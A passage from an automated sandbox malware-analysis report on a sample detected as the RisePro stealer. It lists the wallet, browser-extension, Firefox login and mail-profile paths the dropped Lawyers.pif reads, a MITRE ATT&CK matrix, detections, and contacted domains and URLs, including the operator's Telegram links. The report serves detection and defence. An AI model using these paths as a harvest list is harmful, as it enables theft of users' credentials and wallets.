Source: Lawyers.pif, 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\wallets7
Source: Lawyers.pif, 00000015.00000002.3501287006.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: Lawyers.pif, 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\wallets7

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\signons.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\signons.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\logins.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior

Source: Lawyers.pif	Binary or memory string: WIN_81
Source: Lawyers.pif	Binary or memory string: WIN_XP
Source: Lawyers.pif	Binary or memory string: WIN_XPe
Source: Concerning.0.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyteP
Source: Lawyers.pif	Binary or memory string: WIN_VISTA
Source: Lawyers.pif	Binary or memory string: WIN_7
Source: Lawyers.pif	Binary or memory string: WIN_8

Source: Yara match	File source: 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Lawyers.pif PID: 2304, type: MEMORYSTR

Remote Access Functionality

Yara detected RisePro Stealer

Source: Yara match	File source: 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.3035585776.00000000058AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Lawyers.pif PID: 2304, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\7yC9aM3nOPMh37Qvw5GmIXM.zip, type: DROPPED

Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_00676733 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		15_2_00676733
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_00676BF7 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		15_2_00676BF7

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	2 Valid Accounts	1 Windows Management Instrumentation	11 Scripting	1 Exploitation for Privilege Escalation	51 Disable or Modify Tools	1 OS Credential Dumping	12 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	21 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	2 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	2 Valid Accounts	1 Bypass User Account Control	2 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Scheduled Task/Job	2 Valid Accounts	1 DLL Side-Loading	NTDS	48 System Information Discovery	Distributed Component Object Model	1 Email Collection	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 Bypass User Account Control	LSA Secrets	141 Security Software Discovery	SSH	21 Input Capture	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	212 Process Injection	111 Masquerading	Cached Domain Credentials	111 Virtualization/Sandbox Evasion	VNC	3 Clipboard Data	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Scheduled Task/Job	2 Valid Accounts	DCSync	4 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	111 Virtualization/Sandbox Evasion	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Access Token Manipulation	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	212 Process Injection	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
External24.exe	18%	ReversingLabs	Win32.Dropper.Nullmixer
External24.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	0%	ReversingLabs

Source	Detection	Scanner	Label
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	URL Reputation	safe
http://nsis.sf.net/NSIS_ErrorError	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://ipinfo.io/	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://support.mozilla.org	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://db-ip.com/demo/home.php?s=8.46.123.33a	0%	Avira URL Cloud	safe
https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
http://www.autoitscript.com/autoit3/J	0%	Avira URL Cloud	safe
https://db-ip.com/	0%	Avira URL Cloud	safe
https://ipinfo.io:443/widget/demo/8.46.123.33	0%	Avira URL Cloud	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	0%	Avira URL Cloud	safe
https://ipinfo.io/Mozilla/5.0	0%	Avira URL Cloud	safe
https://t.me/RiseProSUPPORT	0%	Avira URL Cloud	safe
https://db-ip.com:443/demo/home.php?s=8.46.123.33j	0%	Avira URL Cloud	safe
https://db-ip.com/demo/home.php?s=8.46.123.33tQ0	0%	Avira URL Cloud	safe
https://t.me/risepro_bot33203	0%	Avira URL Cloud	safe
https://ipinfo.io/widget/demo/8.46.123.33	0%	Avira URL Cloud	safe
https://www.maxmind.com/en/locate-my-ip-address	0%	Avira URL Cloud	safe
http://www.autoitscript.com/autoit3/0	0%	Avira URL Cloud	safe
https://t.me/risepro_bot	0%	Avira URL Cloud	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	0%	Avira URL Cloud	safe
https://ipinfo.io/t	0%	Avira URL Cloud	safe
https://db-ip.com/demo/home.php?s=8.46.123.33	0%	Avira URL Cloud	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	0%	Avira URL Cloud	safe
http://www.winimage.com/zLibDll	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
ipinfo.io	34.117.186.192	true	false	unknown
db-ip.com	172.67.75.166	true	false	unknown
CcUPthUoPgCKIth.CcUPthUoPgCKIth	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://ipinfo.io/	false	URL Reputation: safe	unknown
https://ipinfo.io/widget/demo/8.46.123.33	false	Avira URL Cloud: safe	unknown
https://db-ip.com/demo/home.php?s=8.46.123.33	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.autoitscript.com/autoit3/J	Lawyers.pif, 0000000A.00000003.1678028298.00000000048B7000.00000004.00000800.00020000.00000000.sdmp, Lawyers.pif, 0000000A.00000000.1667514341.0000000000728000.00000002.00000001.01000000.00000005.sdmp, PixelFlow.pif, 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmp, Lawyers.pif, 00000015.00000000.2875071248.0000000000728000.00000002.00000001.01000000.00000005.sdmp, Lawyers.pif, 00000015.00000002.3501773338.0000000002AB2000.00000004.00000020.00020000.00000000.sdmp, PixelFlow.pif.10.dr, Lawyers.pif.1.dr, Ivory.0.dr	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	Lawyers.pif, 00000015.00000003.3019900839.000000000618E000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3018511190.000000000616D000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3021958870.000000000619A000.00000004.00000020.00020000.00000000.sdmp, 0ffAoFEXM0xBWeb Data.21.dr, IXuJ06djpYzdWeb Data.21.dr, Z7Yuxtpi7pUyWeb Data.21.dr	false	Avira URL Cloud: safe	unknown
https://ipinfo.io:443/widget/demo/8.46.123.33	Lawyers.pif, 00000015.00000003.3349195349.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000002.3501596780.0000000000F20000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	D87fZN3R3jFeplaces.sqlite.21.dr	false	Avira URL Cloud: safe	unknown
https://db-ip.com/demo/home.php?s=8.46.123.33a	Lawyers.pif, 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	Lawyers.pif, 00000015.00000003.3019900839.000000000618E000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3018511190.000000000616D000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3021958870.000000000619A000.00000004.00000020.00020000.00000000.sdmp, 0ffAoFEXM0xBWeb Data.21.dr, IXuJ06djpYzdWeb Data.21.dr, Z7Yuxtpi7pUyWeb Data.21.dr	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Lawyers.pif, 00000015.00000003.3019900839.000000000618E000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3018511190.000000000616D000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3021958870.000000000619A000.00000004.00000020.00020000.00000000.sdmp, 0ffAoFEXM0xBWeb Data.21.dr, IXuJ06djpYzdWeb Data.21.dr, Z7Yuxtpi7pUyWeb Data.21.dr	false	Avira URL Cloud: safe	unknown
https://db-ip.com/	Lawyers.pif, 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll	Lawyers.pif, 00000015.00000002.3501008072.0000000000B50000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Lawyers.pif, 00000015.00000003.3019900839.000000000618E000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3018511190.000000000616D000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3021958870.000000000619A000.00000004.00000020.00020000.00000000.sdmp, 0ffAoFEXM0xBWeb Data.21.dr, IXuJ06djpYzdWeb Data.21.dr, Z7Yuxtpi7pUyWeb Data.21.dr	false	Avira URL Cloud: safe	unknown
https://t.me/RiseProSUPPORT	Lawyers.pif, 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000002.3501287006.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, 7yC9aM3nOPMh37Qvw5GmIXM.zip.21.dr	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Lawyers.pif, 00000015.00000003.3019900839.000000000618E000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3018511190.000000000616D000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3021958870.000000000619A000.00000004.00000020.00020000.00000000.sdmp, 0ffAoFEXM0xBWeb Data.21.dr, IXuJ06djpYzdWeb Data.21.dr, Z7Yuxtpi7pUyWeb Data.21.dr	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	Lawyers.pif, 00000015.00000003.3018791915.000000000616A000.00000004.00000020.00020000.00000000.sdmp, lsqPckitCOdaHistory.21.dr, ZriO6tn8Siv1History.21.dr	false	URL Reputation: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	External24.exe	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	Lawyers.pif, 00000015.00000003.3018791915.000000000616A000.00000004.00000020.00020000.00000000.sdmp, lsqPckitCOdaHistory.21.dr, ZriO6tn8Siv1History.21.dr	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	Lawyers.pif, 00000015.00000003.3019900839.000000000618E000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3018511190.000000000616D000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3021958870.000000000619A000.00000004.00000020.00020000.00000000.sdmp, 0ffAoFEXM0xBWeb Data.21.dr, IXuJ06djpYzdWeb Data.21.dr, Z7Yuxtpi7pUyWeb Data.21.dr	false	URL Reputation: safe	unknown
https://ipinfo.io/Mozilla/5.0	Lawyers.pif, 00000015.00000003.3349195349.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000002.3501596780.0000000000F20000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	D87fZN3R3jFeplaces.sqlite.21.dr	false	URL Reputation: safe	unknown
https://ac.ecosia.org/autocomplete?q=	Lawyers.pif, 00000015.00000003.3019900839.000000000618E000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3018511190.000000000616D000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3021958870.000000000619A000.00000004.00000020.00020000.00000000.sdmp, 0ffAoFEXM0xBWeb Data.21.dr, IXuJ06djpYzdWeb Data.21.dr, Z7Yuxtpi7pUyWeb Data.21.dr	false	URL Reputation: safe	unknown
https://db-ip.com:443/demo/home.php?s=8.46.123.33j	Lawyers.pif, 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://t.me/risepro_bot	Lawyers.pif, 00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, passwords.txt.21.dr	false	Avira URL Cloud: safe	unknown
https://t.me/risepro_bot33203	Lawyers.pif, 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://db-ip.com/demo/home.php?s=8.46.123.33tQ0	Lawyers.pif, 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.maxmind.com/en/locate-my-ip-address	Lawyers.pif	false	Avira URL Cloud: safe	unknown
http://www.autoitscript.com/autoit3/0	Lawyers.pif, 0000000A.00000003.1678028298.00000000048B7000.00000004.00000800.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000002.3501773338.0000000002AB2000.00000004.00000020.00020000.00000000.sdmp, PixelFlow.pif.10.dr, Lawyers.pif.1.dr, Camp.0.dr	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	lsqPckitCOdaHistory.21.dr, ZriO6tn8Siv1History.21.dr	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Lawyers.pif, 00000015.00000003.3019900839.000000000618E000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3018511190.000000000616D000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3021958870.000000000619A000.00000004.00000020.00020000.00000000.sdmp, 0ffAoFEXM0xBWeb Data.21.dr, IXuJ06djpYzdWeb Data.21.dr, Z7Yuxtpi7pUyWeb Data.21.dr	false	URL Reputation: safe	unknown
https://ipinfo.io/t	Lawyers.pif, 00000015.00000002.3501287006.0000000000EEB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
